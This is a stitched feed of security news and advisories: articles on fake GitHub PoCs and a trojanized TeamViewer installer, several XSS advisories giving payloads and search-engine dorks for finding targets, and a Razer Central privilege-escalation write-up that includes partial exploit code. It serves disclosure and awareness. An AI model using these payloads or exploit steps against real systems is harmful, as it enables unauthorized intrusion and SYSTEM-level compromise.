By Habiba Rashid
At the time of writing, all reported fake repositories have been taken down and the malicious PoC has been removed from GitHub.
This is a post from HackRead.com Read the original post: Fake GitHub Repos Caught Dropping Malware as PoCs AGAIN!

**The backdoor dropped in the scam had the ability to exfiltrate a wide range of data, including the hostname, username, and a comprehensive list of home directory contents.**

Cybersecurity researchers have uncovered a deceptive trend within the security community—a proof of concept (PoC) repository on **GitHub** that appears to address vulnerabilities but actually contains a hidden backdoor. The discovery by the Uptycs threat research team has raised concerns among the security research community.

PoCs are typically **used by researchers** to identify potential vulnerabilities through harmless testing. However, this malicious PoC operates as a downloader, disguising its activities as a kernel-level process while silently executing a Linux bash script. 

The backdoor has the ability to exfiltrate a wide range of data, including the hostname, username, and a comprehensive list of home directory contents. Moreover, by adding their SSH key to the authorized\_keys file, an attacker can achieve full control over a targeted system.

One of the fake profiles on GitHub that was used in spreading malicious PoCs (Image credit: Uptycs)

Here, Hackread.com can exclusively confirm that the image used in the above GitHub profile belongs to Shahriyar Hamid oghlu Mammadyarov, known internationally as **Shakhriyar Mamedyarov**, who is an Azerbaijani chess grandmaster. The profile image was stolen from a **blog post** and **a YouTube video** published by the popular Chess-related YouTube channel, ChessBase India.

The backdoor was discovered during the testing of PoCs for various Common Vulnerabilities and Exposures (CVEs) when the Uptycs team encountered a PoC claiming to address the critical vulnerability **CVE-2023-35829**. However, they detected several unusual activities that raised suspicions about the PoC’s legitimacy.

The suspicious behaviours encompassed unexpected network connections, abnormal data transfers, and unauthorized attempts to access the system. Further investigation revealed the significance of the “aclocal.m4” file, which required additional analysis.

The primary function of the binary file contains an interesting string, “kworker,” which plays a crucial role in the deception. The code checks if the binary is named “kworker” and performs specific actions accordingly, establishing **backdoor persistence** through file manipulation.

In their **report**, Nischay Hegde and Siddartha Malladi of the Uptycs Threat Research team wrote that the PoC used forking to create a new process, obscuring the original command line parameters. The parent process then executes the “curl\_func()” function, which downloads a URL containing a bash script. The script is executed if the curl request succeeds.

The fake PoC is a copy of a legitimate exploit for another Linux kernel vulnerability, **CVE-2022-34918**. It creates the illusion of being a root shell, exploiting differences in user namespaces to deceive users. However, the granted privileges are limited to the “/bin/bash” shell within a specific namespace.

Fake PocC (left) – Original PoC (right) – (Image credit: Uptycs)

Using Uptycs Extended Detection and Response (XDR), the binary’s behaviour was identified primarily as a downloader. It retrieves a script from a remote source and executes it on the compromised system. The downloaded script accesses the “/etc/passwd” file and modifies the “~/.ssh/authorized\_keys” file to grant unauthorized access and exfiltrates data using a specific URL.

This incident is not isolated; just last month, **it was reported that** several fake accounts on GitHub and Twitter were spreading malware in malicious PoC that infected both Windows- and Linux-based systems.

At the time of writing, ChriSander22’s repositories were taken down. Although the malicious PoC has also been removed from GitHub, it was widely shared, resulting in significant engagement before its true nature was exposed. Those who executed the PoC are at high risk of data compromise.

Therefore, it is crucial to take immediate action, including removing unauthorized SSH keys, deleting the “kworker” file, removing the kworker path from the “bashrc” file, and checking for potential threats in “/tmp/.iCE-unix.pid.”

**Malicious Repositories**

*   https://github.com/apkc/CVE-2023-35829-poc
*   https://github.com/ChriSanders22/CVE-2023-20871-poc/
*   https://github.com/ChriSanders22/CVE-2023-35829-poc/ (**archive link**)

Differentiating between legitimate and malicious PoCs can be challenging and security researchers are encouraged to adopt safe practices, such as conducting testing in isolated environments like virtual machines, to enhance protection against these **evolving cybersecurity risks**.

**RELATED ARTICLES**

1.  Crooks Targeting LinkedIn Users with Fake Profiles
2.  AI-Generated Images Used to Represent a Fake Law Firm
3.  Fake Facebook Profiles, Google Ads Pushing Sys01 Stealer
4.  Fake LinkedIn Job Offer Scam Hacked Off $625M from Axie Infinity
5.  Hackers Setup Fake Cyber Security Firm to Target InfoSec Experts

I’m a student and cybersecurity writer. On a random Sunday, I am likely to be figuring out life and reading Kafka.

Fake GitHub Repos Caught Dropping Malware as PoCs AGAIN!

An out-of-bounds write vulnerability in Bitdefender Engines on Windows causes the engine to crash. This issue affects Bitdefender Engines version 7.94791 and lower.

CVE-2023-3633

By Habiba Rashid
A fake and malicious version of TeamViewer is being pushed as legitimate, which in reality infects devices with njRAT Malware (aka Bladabindi).
This is a post from HackRead.com Read the original post: Fake TeamViewer Installer Used to Deliver njRAT Malware

**The njRAT malware is a remote access trojan that can perform malicious activities such as keylogging, password stealing, data exfiltration, accessing webcams and microphones, and downloading additional files, posing a significant threat to system privacy and security.**

In recent news, cybersecurity researchers have discovered that threat actors are utilizing the popular remote desktop support software, TeamViewer, as a delivery mechanism for the njRAT malware.

The **njRAT, also known as Bladabindi**, is a remote access trojan that poses a significant threat to the privacy, security, and integrity of affected systems.

The recent findings by Cyble Research & Intelligence Labs (CRIL) shed light on the deceptive tactics employed by threat actors to exploit the trust associated with well-known applications. By leveraging the widespread adoption of TeamViewer, as well as other legitimate tools like WireShark and Process Hacker, the threat actors deceive unsuspecting users into downloading and executing the malicious files.

The njRAT malware, **initially discovered in 2012-2013**, has primarily targeted organizations in Middle Eastern nations. This trojan is capable of carrying out a range of malicious activities, including keylogging, password stealing, data exfiltration, accessing webcams and microphones, and downloading additional files.

Upon closer **analysis**, CRIL researchers identified a 32-bit Smart Installer as the delivery mechanism for the njRAT malware. The installer drops two files in the Windows folder, one of which is the njRAT malware itself, while the other is a genuine TeamViewer application. This clever camouflage allows the malware to operate undetected within compromised systems.

Once executed, the installer triggers the **njRAT** malware and simultaneously launches the legitimate TeamViewer application, creating a deceptive user prompt window that requests the user to proceed with the TeamViewer installation. While the user believes they are installing legitimate software, the njRAT quietly conducts its malicious operations within the compromised system.

To ensure persistence, njRAT modifies system settings, including the “SEE\_MASK\_NOZONECHECKS” environment variable in the Windows registry, thereby bypassing security warning prompts. Additionally, it creates autorun entries in the system registry and copies itself to the startup directory, guaranteeing that it automatically runs every time the system boots up.

njRAT files in the Windows folder (Cyble)

The njRAT trojan also engages in keylogging, capturing keystrokes by utilizing a dedicated thread with continuous monitoring and storage of the captured data. It collects various system information and encodes it using the base64 encoding scheme for exfiltration.

The malware establishes a connection with a Command and Control (C&C) server to transmit the gathered information, awaiting instructions from the C&C server for further malicious actions. 

The exploitation of legitimate **software like TeamViewer** highlights the resourcefulness and adaptability of threat actors in spreading malware. Users must take precautionary measures to protect themselves from such attacks.

Recommendations include downloading tools and applications only from official websites, enabling automatic software updates, using reputable antivirus and internet security software, and exercising caution when opening untrusted links or email attachments.

1.  TeamViewer was Targeted by Chinese Hackers in 2016
2.  TeamSpy malware targeting users via malicious TeamViewer app
3.  Hackers targeting embassies with trojanized version of TeamViewer
4.  VirusTotal Reveals Apps Most Exploited by Hackers to Spread Malware

I’m a student and cybersecurity writer. On a random Sunday, I am likely to be figuring out life and reading Kafka.

Fake TeamViewer Installer Used to Deliver njRAT Malware

BloodBank version 1.0 suffers from a cross site scripting vulnerability.

    ======================================================================================================================================| # Title     : BloodBank v1.0 - Blood Donor Directory CMS with PayPal Integration XSS Vulnerability                                 || # Author    : indoushka                                                                                                            || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.2(64-bit)                                               || # Vendor    : https://codecanyon.net/item/bloodbank-blood-donor-directory-cms-with-paypal-integration/21188267                     |  | # Dork      : n/a                                                                                                                  |======================================================================================================================================poc :[+]  Dorking İn Google Or Other Search Enggine .[+]  use payload in search box: <script>alert(/indoushka/);</script>[+]  http://127.0.0.1/demosly.om/xicia/cc/bloodbank/Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

BloodBank 1.0 Cross Site Scripting

Blogator version 0.93 suffers from a cross site scripting vulnerability.

    ====================================================================================================================================| # Title     : Blogator script v 0.93 XSS Vulnerability                                                                           || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.2(64-bit)                                             || # Vendor    : http://www.blogator.net/                                                                                           |  | # Dork      : Weblogs par Blogator-script www.blogator-script.com © 2006 SAMTEK - Blogator                                       |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine [+] Use Payload : ?msg=Ce%2520pseudo%2520de%2520membre%2520est%2520inconnu%27%22%28%29%26%25%3CScRiPt%20%3Eprompt%28904707%29%3C/ScRiPt%3E[+] http://127.0.0.1//tst/?msg=Ce%2520pseudo%2520de%2520membre%2520est%2520inconnu%27%22%28%29%26%25%3CScRiPt%20%3Eprompt%28904707%29%3C/ScRiPt%3EGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

Blogator 0.93 Cross Site Scripting

Bigware Shop version 2.3 suffers from a cross site scripting vulnerability.

    ====================================================================================================================================| # Title     : Bigware Shop v2.3 XSS Vulnerability                                                                                || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.2(64-bit)                                             || # Vendor    : http://www.bigware.de/                                                                                             |  | # Dork      :                                                                                                                    |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine [+] Xss /Html inject Use Payload : /main_bigware_39.php?bigPfad=&items_id=67%27%22%28%29%26%25%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3Eindoushka%3C/font%3E%3C/marquee%3E[+] http://target_site/main_bigware_39.php?bigPfad=&items_id=67%27%22%28%29%26%25%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3Eindoushka%3C/font%3E%3C/marquee%3EGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

Bigware Shop 2.3 Cross Site Scripting

Bazaar Social Listing Shopping Web PHP Template version 2.3.2 suffers from a cross site scripting vulnerability.

    ====================================================================================================================================| # Title     : Bazaar Social Listing Shopping Web PHP Template v2.3.2 XSS Vulnerability                                           || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.2(32-bit)                                             | | # Vendor    : https://codecanyon.net/item/bazaar-social-listing-shopping-web-php-template/23207913?s_rank=87                     |  | # Dork      : "/ad-info.php?adObjID="                                                                                            |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Create New User Account.[+] Edit your account https://127.0.0.1/egyptdrinkscom/settings.php or Sell an item https://127.0.0.1/egyptdrinkscom/sell-edit-stuff.php[+] Put Your Payload xss/hrml .====Greetings to :=====================================================================================================================jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh     |=======================================================================================================================================

Bazaar Social Listing Shopping Web PHP Template 2.3.2 Cross Site Scripting

Improper Input Validation in the hyperlink interpretation in Savoir-faire Linux's Jami (version 20222284) on Windows. 

This allows an attacker to send a custom HTML anchor tag to pass a string value to the Windows QRC Handler through the Jami messenger.



To use PolyGerrit, please enable JavaScript in your browser settings, and then refresh this page.

CVE-2023-3434

Congratulations to all the researchers recognized in this quarter’s Microsoft Researcher Recognition Program leaderboard! Thank you to everyone for your hard work and continued partnership to secure customers.
The top three researchers of the 2023 Q2 Security Researcher Leaderboard are: Yuki Chen, HAO LI, wkai!
Check out the full list of researchers recognized this quarter here.

Congratulations to all the researchers recognized in this quarter’s Microsoft Researcher Recognition Program leaderboard! Thank you to everyone for your hard work and continued partnership to secure customers.

The top three researchers of the 2023 Q2 Security Researcher Leaderboard are: **Yuki Chen, HAO LI, wkai!**

Check out the full list of researchers recognized this quarter here.

Congratulations to the top Azure researchers this quarter: **goodbyeselene, HAO LI, basvdlouw!**

Congratulations to the top Office researchers this quarter: **Anonymous, zcgonvh, Harun Can!**

Congratulations to the top Windows researchers this quarter: **Yuki Chen, wkai, k0shl!**

This 2023 Q2 leaderboard reflects point values for cases that are:

*   Submitted and assessed by the MSRC team between April 1, 2023, and June 30, 2023
    
*   Submitted and assessed by the MSRC team between January 1, 2023, and March 31, 2023 (last program period), but assessed after April 1, 2023
    

Past MSRC Quarterly Leaderboards:

*   2023-04: MSRC 2022 Q1 Security Researcher Leaderboard
    
*   2023-01: MSRC 2022 Q4 Security Researcher Leaderboard
    
*   2022-10: MSRC 2022 Q3 Security Researcher Leaderboard
    
*   2022-07: MSRC 2022 Q2 Security Researcher Leaderboard
    
*   2022-04: MSRC 2022 Q1 Security Researcher Leaderboard
    
*   2022-02: MSRC 2021 Q4 Security Researcher Leaderboard
    
*   2021-10: MSRC 2021 Q3 Security Researcher Leaderboard
    

Keep up the awesome work and we look forward to seeing you next quarter!

_Madeline Eckert, MSRC_

Congratulations to the Top MSRC 2023 Q2 Security Researchers!

Improper Privilege Control in RazerCentralSerivce Named Pipe in Razer RazerCentral <=7.11.0.558 on Windows allows a malicious actor with local access to gain SYSTEM privilege via communicating with the named pipe as a low-privilege user and calling "AddModule" or "UninstallModules" command to execute arbitrary executable file.



**Summary**

**Product**

Razer CentralService

**Vendor**

Razer

**Severity**

High - Adversaries may exploit software vulnerabilities to obtain privilege escalation.

**Affected Versions**

Razer Central 7.11.0.558 and below

**Tested Versions**

Razer Central 7.8.0.381 to 7.11.0.558

**CVE Identifier**

CVE-2023-3514

**CVSS3.1 Scoring System**

**Base Score:** 7.8 (High) **Vector String:** CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

**Metric**

**Value**

**Attack Vector (AV)**

Local

**Attack Complexity (AC)**

Low

**Privileges Required (PR)**

low

**User Interaction (UI)**

None

**Scope (S)**

Unchanged

**Confidentiality (C)**

High

**Integrity (I)**

High

**Availability (A)**

High

**Product Overview**

Razer Synapse 3 is a software suite developed by Razer, a leading gaming hardware manufacturer. It serves as a centralized hub for customizing and optimizing Razer peripherals, including keyboards, mice, headsets, and other gaming accessories. With its intuitive user interface, Synapse 3 allows gamers to personalize their devices by creating unique profiles, assigning macros, and fine-tuning settings such as lighting effects and DPI sensitivity. This software provides seamless integration with cloud storage, enabling users to access their personalized configurations from anywhere. With its advanced features and extensive compatibility, Razer Synapse 3 empowers gamers to enhance their gaming experience and gain a competitive edge.

**Description of the vulnerability**

There is a service named RazerCentralService.exe installed, which plays a crucial role in managing user information and notifications. Applications establish communication with this service through a namedpipe. However, an unfortunate bug exists in RazerCentralService.exe, which can potentially enable users with low privileges to execute code as the system. This vulnerability affects computers with the RazerCentralService installed.

The RazerCentralService.exe uses NamedPipe to communicate with other processes.

    pipe_name = r'\\.\pipe\{FC828A97-C116-453D-BD88-AD471496E03C}'
    

The provided code assigns the variable pipe_name with the name of the currently used pipe, represented as \\.\pipe\{FC828A97-C116-453D-BD88-AD471496E03C} in this example.

It’s important to note that several services can be accessed via NamedPipe without undergoing appropriate sanitization. This lack of sanitization exposes them to potential security risks.

    namespace Razer.ActionService
    {
    	// Token: 0x02000006 RID: 6
    	public enum RzServiceType
    	{
    		// Token: 0x0400001B RID: 27
    		UpdateManager = 2,
    		// Token: 0x0400001C RID: 28
    		AccountManager = 4,
    		// Token: 0x0400001D RID: 29
    		Notifications = 5,
    		// Token: 0x0400001E RID: 30
    		ActionCenter
    	}
    }
    

The \`UpdateManager\`\` service provides the following functionalities:

    public class UpdateManagerIpcWrapper : UpdateManagerIpcBase, IDisposable
    	{
    		// Token: 0x060002AA RID: 682 RVA: 0x00010510 File Offset: 0x0000E710
    		public UpdateManagerIpcWrapper(IUpdateController controller, IUpdateManager manager, INacServiceClient nacClient)
    		{
    			this.m_manager = manager;
    			this.m_controller = controller;
    			this.m_nacClient = nacClient;
    			this.m_controller.UpdatesAvailable += this.FireUpdatesAvailable;
    			this.m_manager.ProductRegistered += this.FireProductRegistered;
    			this.m_manager.CheckingForUpdates += this.FireCheckingForUpdates;
    			this.m_manager.InstallComplete += this.FireInstallComplete;
    			this.m_manager.DownloadProgress += this.FireDownloadProgress;
    			this.m_manager.DownloadComplete += this.FireDownloadComplete;
    			this.m_manager.ModuleInstallStart += this.FireModuleInstallStart;
    			this.m_manager.InstallProgress += this.FireInstallProgress;
    			this.m_manager.ModuleDownloadProgress += this.FireModuleDownloadProgress;
    			this.m_manager.ModuleDownloadComplete += this.FireModuleDownloadComplete;
    			this.m_manager.OptionalModuleInstallStart += this.FireOptionalModuleInstallStart;
    			this.m_manager.OptionalModuleInstallComplete += this.FireOptionalModuleInstallComplete;
    			this.m_manager.OptionalModuleUninstallStart += this.FireOptionalModuleUninstallStart;
    			this.m_manager.OptionalModuleUninstallComplete += this.FireOptionalModuleUninstallComplete;
    			manager.EndpointChange += this.FireEndpointChange;
    			base.RegisterHandler(Commands.AddModule, new Func<IRazerSocket, byte[], byte[]>(this.HandleAddModule));
    			base.RegisterHandler(Commands.RemoveModule, new Func<IRazerSocket, byte[], byte[]>(this.HandleRemoveModule));
    			base.RegisterHandler(Commands.Register, new Func<IRazerSocket, byte[], byte[]>(this.HandleRegister));
    			base.RegisterHandler(Commands.RegisterForUpdates, new Func<IRazerSocket, byte[], byte[]>(this.HandleRegisterForUpdates));
    			base.RegisterHandler(Commands.GetUpdates, new Func<IRazerSocket, byte[], byte[]>(this.HandleGetUpdates));
    			base.RegisterHandler(Commands.GetInstalledOptionalModules, new Func<IRazerSocket, byte[], byte[]>(this.HandleGetInstalledOptionalModules));
    			base.RegisterHandler(Commands.GetAvailableOptionalModules, new Func<IRazerSocket, byte[], byte[]>(this.HandleGetAvailableOptionalModules));
    			base.RegisterHandler(Commands.GetOptionalModules, new Func<IRazerSocket, byte[], byte[]>(this.HandleGetOptionalModules));
    			base.RegisterHandler(Commands.CheckForUpdates, new Func<IRazerSocket, byte[], byte[]>(this.HandleCheckForUpdates));
    			base.RegisterHandler(Commands.DownloadUpdate, new Func<IRazerSocket, byte[], byte[]>(this.HandleDownloadUpdate));
    			base.RegisterHandler(Commands.PauseDownload, new Func<IRazerSocket, byte[], byte[]>(this.HandlePauseDownload));
    			base.RegisterHandler(Commands.PauseModuleDownload, new Func<IRazerSocket, byte[], byte[]>(this.HandlePauseModuleDownload));
    			base.RegisterHandler(Commands.CancelDownload, new Func<IRazerSocket, byte[], byte[]>(this.HandleCancelDownload));
    			base.RegisterHandler(Commands.CancelModuleDownload, new Func<IRazerSocket, byte[], byte[]>(this.HandleCancelModuleDownload));
    			base.RegisterHandler(Commands.InstallUpdates, new Func<IRazerSocket, byte[], byte[]>(this.HandleInstallUpdates));
    			base.RegisterHandler(Commands.GetInstalledSoftware, new Func<IRazerSocket, byte[], byte[]>(this.HandleGetInstalledSoftware));
    			base.RegisterHandler(Commands.PostponeUpdates, new Func<IRazerSocket, byte[], byte[]>(this.HandlePostponeUpdates));
    			base.RegisterHandler(Commands.ShowUpdates, new Func<IRazerSocket, byte[], byte[]>(this.HandleShowUpdates));
    			base.RegisterHandler(Commands.SetIconPath, new Func<IRazerSocket, byte[], byte[]>(this.HandleSetIconPath));
    			base.RegisterHandler(Commands.InstallModules, new Func<IRazerSocket, byte[], byte[]>(this.HandleInstallModules));
    			base.RegisterHandler(Commands.DownloadModule, new Func<IRazerSocket, byte[], byte[]>(this.HandleDownloadModule));
    			base.RegisterHandler(Commands.UninstallModules, new Func<IRazerSocket, byte[], byte[]>(this.HandleUninstallModules));
    			base.RegisterHandler(Commands.GetRegisteredProducts, new Func<IRazerSocket, byte[], byte[]>(this.HandleGetRegisteredProducts));
    			base.RegisterHandler(Commands.RegisterDevices, new Func<IRazerSocket, byte[], byte[]>(this.HandleRegisterDevices));
    			base.RegisterHandler(Commands.UnregisterDevices, new Func<IRazerSocket, byte[], byte[]>(this.HandleUnregisterDevices));
    			base.RegisterHandler(Commands.ClearRegisteredDevices, new Func<IRazerSocket, byte[], byte[]>(this.HandleClearRegisteredDevices));
    			base.RegisterHandler(Commands.GetRegisteredDevices, new Func<IRazerSocket, byte[], byte[]>(this.HandleGetRegisteredDevices));
    			base.RegisterHandler(Commands.SetEndpoint, new Func<IRazerSocket, byte[], byte[]>(this.HandleSetEndpoint));
    			base.RegisterHandler(Commands.GetEndpointDetails, new Func<IRazerSocket, byte[], byte[]>(this.HandleGetEndpointDetails));
    			base.RegisterHandler(Commands.GetEndpointDetailsEx, new Func<IRazerSocket, byte[], byte[]>(this.HandleGetEndpointDetailsEx));
    			base.RegisterHandler(Commands.Setting_SetCheckAutomatically, new Func<IRazerSocket, byte[], byte[]>(this.HandleCheckForUpdatesAutomatically_Set));
    			base.RegisterHandler(Commands.Setting_GetCheckAutomatically, new Func<IRazerSocket, byte[], byte[]>(this.HandleCheckForUpdatesAutomatically_Get));
    			base.RegisterHandler(Commands.Setting_SetDownloadAutomatically, new Func<IRazerSocket, byte[], byte[]>(this.HandleDownloadAutomatically_Set));
    			base.RegisterHandler(Commands.Setting_GetDownloadAutomatically, new Func<IRazerSocket, byte[], byte[]>(this.HandleDownloadAutomatically_Get));
    			base.RegisterHandler(Commands.Setting_SetUpdateInterval, new Func<IRazerSocket, byte[], byte[]>(this.HandleUpdateInterval_Set));
    			base.RegisterHandler(Commands.Setting_GetUpdateInterval, new Func<IRazerSocket, byte[], byte[]>(this.HandleUpdateInterval_Get));
    			base.RegisterHandler(Commands.Setting_SetMaxDownloadSpeed, new Func<IRazerSocket, byte[], byte[]>(this.HandleMaxDownloadSpeed_Set));
    			base.RegisterHandler(Commands.Setting_GetMaxDownloadSpeed, new Func<IRazerSocket, byte[], byte[]>(this.HandleMaxDownloadSpeed_Get));
    			base.RegisterHandler(Commands.Event_ModuleInstallStart, new Func<IRazerSocket, byte[], byte[]>(this.RouteModuleInstallStart));
    			base.RegisterHandler(Commands.Event_ModuleInstallComplete, new Func<IRazerSocket, byte[], byte[]>(this.RouteInstallProgress));
    			base.RegisterHandler(Commands.Event_InstallComplete, new Func<IRazerSocket, byte[], byte[]>(this.RouteInstallComplete));
    		}
    

After thoroughly examining the code, we stumbled upon an interesting revelation: the AddModule and UninstallModules commands possess the crucial functionality required for generating a fraudulent module and running our binary with the highly desirable SYSTEM privilege. These commands have the ability to accept input in xml formats. By cleverly constructing a malicious xml input, we can make RazerCentralService.exe to execute our binary with the mighty SYSTEM privilege.

    def add_module():
    	product = 'Emily3'
    	module = 'my_test_module'
    
    	version = struct.pack('<IIII', 0x11223344, 0x11223344, 0x11223344, 0x11223344)
    	update_module = '''
    <a>
    <Module>
    	<AdminPrivilegeRequired>1</AdminPrivilegeRequired>
    	<SynapseRestartRequired>0</SynapseRestartRequired>
    	<Description>desc</Description>
    	<Name>my_test_module</Name>
    	<DisplayName>my_test_module</DisplayName>
    	<FileName>D:\\test.exe</FileName>
    	<Visible>1</Visible>
    	<IconPath>C:\\ProgramData\\Razer\\Razer Central\\Update\\GameBooster2\\AppIcon.ico</IconPath>
    	<LaunchFilePath>D:\\test.exe</LaunchFilePath>
    	<DownloadURL>http://127.0.0.1</DownloadURL>
    	<UninstallFilePath>C:\\Windows\\System32\\notepad.exe</UninstallFilePath>
    </Module>
    </a>
    '''
    
    def uninstall_modules():
    	product = 'Emily3'
    	modules = '''
    	<a>
    		<String>my_test_module</String>
    	</a>
    '''
    
    	data = serialize_string(product)
    	data += serialize_string(modules)
    
    	p = create_message(UpdateManager, UninstallModules, data)
    	send_packet(p)
    

Here is a proof of concept (POC) written in Python 2 that you can use to execute notepad.exe as the SYSTEM user. Simply run the POC code provided here.

**Reproduction Steps**

For simplicity, follow the following steps to re-produce.

1.  Install the Razer software.
2.  Install Python 2 and the necessary Python modules.
3.  Log in and wait for 3-5 minutes to ensure that the directory at C:\ProgramData\Razer\Razer Central\Accounts exists.
4.  Execute the exploit script using Python 2.

**Conclusion**

In summary, relying on an encrypted file with a hardcoded key is not a dependable security measure. When operating as the SYSTEM user, it is crucial to exercise prudence in your actions. To tackle this problem, consider implementing the following measures:

*   Verify that the NamedPipe has the appropriate permissions configured.
*   Sanitize any untrusted input originating from the NamedPipe to prevent potential vulnerabilities.

**Credits**

Phan Thanh Duy (@PTDuy) of STAR Labs SG Pte. Ltd. (@starlabs\_sg)

Tag

#windows